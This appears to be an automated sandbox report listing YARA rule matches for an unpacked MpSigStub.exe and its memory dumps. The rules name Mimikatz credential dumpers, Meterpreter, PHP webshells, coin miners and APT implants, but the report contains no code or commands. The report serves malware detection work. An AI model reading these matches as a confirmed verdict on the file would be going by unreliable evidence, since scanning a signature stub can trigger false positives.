Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Gazer_logfile_name date = 30.08.2017, author = ESET, description = Detects Tura's Gazer malware, reference = https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: gh0st author = https://github.com/jackcr/
Source: 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp, type: MEMORY Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18299696915.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000023.00000003.18336077687.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18324883471.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp, type: MEMORY Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp, type: MEMORY Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: 00000023.00000003.18285899877.0000015B1B2C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18285899877.0000015B1B2C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18323536692.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18299514362.0000015B1AF02000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_unspecified_Jan18_1 date = 2018-01-19, hash1 = f87879b29ff83616e9c9044bd5fb847cf5d2efdd2f01fc284d1a6ce7d464a417, author = Florian Roth, description = Detects unspecified malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_base64_encoded_payloads date = 2021/01/07, author = Arnim Rupp, description = php webshell containing base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 88d0d4696c9cb2d37d16e330e236cb37cfaec4cd
Source: 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18411185064.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18411185064.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18330301023.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
